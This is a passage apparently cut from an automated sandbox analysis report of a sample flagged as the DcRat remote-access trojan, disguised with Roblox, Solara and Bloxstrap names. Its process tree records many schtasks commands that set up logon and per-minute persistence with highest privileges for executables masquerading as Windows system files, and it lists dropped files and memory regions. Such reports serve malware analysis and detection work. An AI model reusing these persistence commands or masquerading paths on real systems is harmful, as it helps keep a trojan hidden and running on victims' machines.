                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                                  4⤵
                                                                                                                                                                  • DcRat
                                                                                                                                                                  PID:1948
                                                                                                                                                              • C:\Windows\system32\CMD.exe
                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1604
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:940
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2500
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:284
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2540
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:1536
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2576
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1508
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2100
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1620
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 6 /tr "'C:\winNet\Bloxstrap.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2520
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1616
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 7 /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2116
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1944
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2316
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:1720
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\services.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2056
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\services.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2620
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\services.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2912
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\Refcrt.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:3004
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\MSOCache\All Users\Refcrt.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2220
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\Refcrt.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1492
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Common Files\csrss.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:1820
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1152
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2968
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Music\csrss.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2248
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Music\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2916
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Music\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2840
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\sppsvc.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2328
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\twain_32\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:1972
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Windows\twain_32\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2740
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2772
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2860
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2684
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1968
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2768
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2000
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2960
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2228
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2072
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2284
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:840
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1624
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 12 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1632
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1784
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 6 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2496
                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                                              1⤵
                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:1660
                                                                                                                                                              • C:\Windows\system32\MsiExec.exe
                                                                                                                                                                C:\Windows\system32\MsiExec.exe -Embedding 24DB5C81B615D0AD00A42217A5D9562F
                                                                                                                                                                2⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:1948
                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding C1A7B264966EDDF33BCF128627D0C296
                                                                                                                                                                2⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:1968
                                                                                                                                                            • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                              C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2748
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:1156
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:2620
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:2716
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:2404
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                PID:2920
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                PID:2268
                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "909049509-6533765031900255637-2070495065-305685155-1046318106-855059111423792356"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2720
                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "6937931028219448122055107728-1831467133735503772-661204874-1257183238690169128"
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2936

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                  Downloads

                                                                                                                                                                  • C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

                                                                                                                                                                    Filesize

                                                                                                                                                                    239B

                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                    Filesize

                                                                                                                                                                    304B

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0ZXuryP2Tv

                                                                                                                                                                    Filesize

                                                                                                                                                                    20KB

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1oaokwMKbm

                                                                                                                                                                    Filesize

                                                                                                                                                                    92KB

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.2MB

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\CabD2DB.tmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    70KB

  • C:\Users\Admin\AppData\Local\Temp\Frage build.exe

    Filesize

    2.1MB


  • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

    Filesize

    797KB


  • C:\Users\Admin\AppData\Local\Temp\TarD2FD.tmp

    Filesize

    181KB


  • C:\Users\Admin\AppData\Local\Temp\cYTMg7h175

    Filesize

    46KB


  • C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

    Filesize

    30.1MB


  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EQF6QU5ZSYD3HM3E3US2.temp

    Filesize

    7KB


  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JHZWYTZHFZCJ2CRAQJTE.temp

    Filesize

    7KB


  • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat

    Filesize

    46B


  • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

    Filesize

    1.5MB


  • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe

    Filesize

    221B


  • C:\winNet\WerFault.exe

    Filesize

    1.6MB


  • C:\winNet\we9fgyC144zVOkGk.vbe

    Filesize

    215B


  • \Users\Admin\AppData\Local\Temp\DCRatBuild.exe

    Filesize

    1.9MB


  • \Users\Admin\AppData\Local\Temp\Result.exe

    Filesize

    2.6MB


  • \Users\Admin\AppData\Local\Temp\Youtube.exe

    Filesize

    8.7MB


                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\sddsfsdf.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    485KB

                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\solara.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.8MB


                                                                                                                                                                  • memory/2348-921-0x0000000001F80000-0x0000000001F88000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    32KB

                                                                                                                                                                  • memory/2348-920-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.9MB

                                                                                                                                                                  • memory/2372-21-0x0000000000E20000-0x0000000000EA0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    512KB

                                                                                                                                                                  • memory/2372-427-0x0000000000450000-0x000000000045C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    48KB

                                                                                                                                                                  • memory/2376-368-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2404-603-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2404-752-0x0000000000FB0000-0x000000000118A000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.9MB

                                                                                                                                                                  • memory/2440-702-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2448-372-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2548-90-0x0000000000400000-0x0000000000CC7000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8.8MB

                                                                                                                                                                  • memory/2592-699-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2596-696-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2596-420-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2620-444-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2640-709-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2704-514-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2712-369-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2716-445-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2728-704-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2740-63-0x0000000000400000-0x000000000069B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.6MB

                                                                                                                                                                  • memory/2748-712-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2756-358-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2756-355-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    32KB

                                                                                                                                                                  • memory/2756-354-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.9MB

                                                                                                                                                                  • memory/2780-680-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2816-459-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2840-394-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2876-602-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2880-700-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

